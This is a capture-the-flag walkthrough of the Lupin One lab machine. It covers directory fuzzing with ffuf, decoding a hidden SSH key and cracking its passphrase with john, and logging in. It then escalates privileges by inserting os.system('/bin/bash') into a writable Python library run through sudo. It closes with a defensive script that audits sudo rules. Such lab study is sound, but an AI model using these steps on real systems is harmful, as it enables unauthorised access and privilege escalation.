```
[03:22:02] 403 - 278B - /.htpasswd_test
[03:22:02] 403 - 278B - /.htaccess.save
[03:22:02] 403 - 278B - /.htaccessOLD2
[03:22:02] 403 - 278B - /.htaccess_sc
[03:22:02] 403 - 278B - /.htpasswds
[03:22:02] 403 - 278B - /.httr-oauth
[03:22:02] 403 - 278B - /.htm
[03:22:36] 301 - 314B - /image -> http://192.168.0.133/image/
[03:22:38] 301 - 319B - /javascript -> http://192.168.0.133/javascript/
[03:22:42] 301 - 315B - /manual -> http://192.168.0.133/manual/
[03:22:42] 200 - 208B - /manual/index.html
[03:22:55] 200 - 34B - /robots.txt
[03:22:56] 403 - 278B - /server-status/
[03:22:56] 403 - 278B - /server-status
Task Completed
```
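The scan finds robots.txt. Visiting the ~myfiles directory shows nothing of interest, and other directory-scanning tools did not turn up anything useful either.

![Screenshot](https://img-blog.csdnimg.cn/direct/9ab43c9cfeab440b91b8ab0eef82e469.png)`Visiting ~myfiles`

![Screenshot](https://img-blog.csdnimg.cn/direct/d214019e63c94f9ba3f653a2263f5012.png)

### 4. The ffuf command

`ffuf is a fuzzing tool for web applications that quickly and flexibly finds hidden content, directories or files`

- `-u`: URL
- `-c`: colorize the output
- `-r`: follow redirects
- `-w`: wordlist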
```
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.0.133/~FUZZ"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
:: Method : GET
:: URL : http://192.168.0.133/~FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
secret [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]
```
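`The scan finds the secret directory; visit it`

![Screenshot](https://img-blog.csdnimg.cn/direct/169b202ca6e246c9babc3adce2ba1168.png)

Hello friend, I'm glad you found my secret directory. I created it like this to share with you the SSH private key file I created. It is hidden somewhere here so that hackers won't find it and crack my password with fasttrack. I'm smart, I know that. If you have any problem, let me know. Your best friend, icex64

The note tells us to look for an SSH key, and that the user's name is icex64.

#### Continue scanning inside this directory with ffuf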
`.mysecret.txt`
```
┌──(root㉿kali)-[~]
└─# ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u "http://192.168.0.133/~secret/.FUZZ" -e .txt,.bak,.html,.pub -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
:: Method : GET
:: URL : http://192.168.0.133/~secret/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Extensions : .txt .bak .html .pub
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
directory-list-2.3-small.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 4ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
or send a letter to Creative Commons, 171 Second Street, .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 8ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 7ms]
Copyright 2007 James Fisher.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
Copyright 2007 James Fisher [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
Attribution-Share Alike 3.0 License. To view a copy of this .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
Attribution-Share Alike 3.0 License. To view a copy of this .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
Attribution-Share Alike 3.0 License. To view a copy of this .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
or send a letter to Creative Commons, 171 Second Street, .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 20ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 12ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 21ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 13ms]
Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 18ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 14ms]
or send a letter to Creative Commons, 171 Second Street, .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 19ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 15ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
This work is licensed under the Creative Commons .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 35ms]
directory-list-2.3-small.txt.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 37ms]
Attribution-Share Alike 3.0 License. To view a copy of this .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
or send a letter to Creative Commons, 171 Second Street, .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
directory-list-2.3-small.txt.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 42ms]
This work is licensed under the Creative Commons .html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
Copyright 2007 James Fisher.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
Copyright 2007 James Fisher.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 44ms]
directory-list-2.3-small.txt.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
This work is licensed under the Creative Commons .bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 45ms]
This work is licensed under the Creative Commons .txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
directory-list-2.3-small.txt.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 46ms]
Copyright 2007 James Fisher.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
This work is licensed under the Creative Commons [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 48ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 50ms]
license, visit http://creativecommons.org/licenses/by-sa/3.0/ .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 51ms]
on atleast 3 different hosts [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
on atleast 3 different hosts.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 41ms]
on atleast 3 different hosts.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
Priority ordered case sensative list, where entries were found .pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 43ms]
on atleast 3 different hosts.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
on atleast 3 different hosts.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.txt [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
#.bak [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 39ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 38ms]
#.html [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
#.pub [Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 40ms]
[Status: 200, Size: 331, Words: 52, Lines: 6, Duration: 47ms]
mysecret.txt [Status: 200, Size: 4689, Words: 1, Lines: 2, Duration: 56ms]
:: Progress: [438320/438320] :: Job [1/1] :: 938 req/sec :: Duration: [0:08:00] :: Errors: 0 ::
```
![Screenshot](https://img-blog.csdnimg.cn/direct/ec64a7789e1d4bb0a31f03c2cc690972.png)

![Screenshot](https://img-blog.csdnimg.cn/direct/f382ca6e90bb469db2d7b0ca4f46159e.png)

> Base58-decoding the content yields an SSH private key.

### 5. Cracking the SSH private key passphrase

#### 1. Write the private key to sh.txt

![Screenshot](https://img-blog.csdnimg.cn/direct/eead79469a054160b3b43fb95154cdcf.png)

#### 2. Convert the private key into a form that john can crack
```
┌──(root㉿kali)-[~]
└─# /usr/bin/ssh2john sh.txt > hash
```
#### 3. Crack it with John

I had already cracked it earlier.
```
┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john --show hash
sh.txt:P@55w0rd!
1 password hash cracked, 0 left
```
### 6. Logging in with the SSH private key
```
┌──(root㉿kali)-[~]
└─# ssh -i sh.txt icex64@192.168.0.133
Enter passphrase for key 'sh.txt':
Linux LupinOne 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64
########################################
Welcome to Empire: Lupin One
########################################
Last login: Wed Feb 7 00:46:39 2024 from 192.168.0.130
icex64@LupinOne:~$
```
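### 7. Privilege escalation from icex64

`sudo -l`

The output shows a Python file: icex64 may run heist.py as the user arsene without a password. That suggests starting a new shell as arsene from within the Python code.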
```
icex64@LupinOne:~$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:~$ cat /home/arsene/heist.py
import webbrowser
print ("Its not yet ready to get in action")
webbrowser.open("https://empirecybersecurity.co.mz")
```
`heist.py imports the webbrowser module, so locate that module`
```
icex64@LupinOne:~$ find / -name webbrowser.py -type f 2>/dev/null
/usr/lib/python3.9/webbrowser.py
icex64@LupinOne:~$ head /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.
import os
import shlex
import shutil
import sys
import subprocess
```
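The module imports os, so a new shell can be started with os.system("/bin/bash"). Add os.system("/bin/bash") to webbrowser.py. The edit is possible only because icex64 has write access to /usr/lib/python3.9/webbrowser.py.

Edit the file with vi: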
```
icex64@LupinOne:/tmp$ head -n 20 /usr/lib/python3.9/webbrowser.py
#! /usr/bin/env python3
"""Interfaces for launching and remotely controlling Web browsers."""
# Maintained by Georg Brandl.
import os
import shlex
import shutil
import sys
import subprocess
import threading
os.system("/bin/bash")
__all__ = ["Error", "open", "open_new", "open_new_tab", "get", "register"]
```
`After adding the line, run the script`
```
icex64@LupinOne:/tmp$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:/tmp$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
We are now the arsene user.
### 8. Privilege escalation from arsene

`Privilege escalation through pip`

[**https://gtfobins.github.io/gtfobins/pip/**](https://gtfobins.github.io/gtfobins/pip/)
```
arsene@LupinOne:/tmp$ sudo -l
Matching Defaults entries for arsene on LupinOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
```
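An added example, not from the original write-up: a small auditor that reads `sudo -l` output like the two listings on this page and reports NOPASSWD rules that hand out an interpreter or installer, noting whether the rule pins its arguments. The `CODE_RUNNERS` set and the function names are assumptions for illustration, and the sample text is constructed from the output shown above.

```python
import os
import re

# Illustrative subset of programs that can run arbitrary code for the caller
# (interpreters, installers, editors); extend it to match local policy.
CODE_RUNNERS = {"python", "pip", "perl", "ruby", "bash", "sh", "vi", "vim", "find"}

# "(runas) TAG: TAG: /path/to/cmd args..." as printed by `sudo -l`
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")

# Constructed sample: the rule lines from both `sudo -l` listings on this page.
SAMPLE = """\
User icex64 may run the following commands on LupinOne:
    (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
User arsene may run the following commands on LupinOne:
    (root) NOPASSWD: /usr/bin/pip
"""


def parse_rules(sudo_l_output):
    """Yield (runas, tags, argv) for each rule line of `sudo -l` output."""
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if m:
            tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
            yield m["runas"], tags, m["cmd"].split()


def risky_rules(sudo_l_output):
    """Return NOPASSWD rules whose program is a known code runner."""
    hits = []
    for runas, tags, argv in parse_rules(sudo_l_output):
        # Strip version suffixes: /usr/bin/python3.9 -> python, pip3 -> pip
        base = re.sub(r"[\d.]+$", "", os.path.basename(argv[0]))
        if "NOPASSWD" in tags and base in CODE_RUNNERS:
            # A rule without arguments lets the caller supply any arguments.
            scope = "pinned-args" if len(argv) > 1 else "any-args"
            hits.append((runas, argv[0], scope))
    return hits


if __name__ == "__main__":
    for runas, program, scope in risky_rules(SAMPLE):
        print(f"runs as {runas}: {program} ({scope})")
```

A `pinned-args` rule is only as safe as the script and every module it imports, which is what the icex64 rule on this page shows; an `any-args` rule for an installer such as pip leaves the choice of what gets run to the caller.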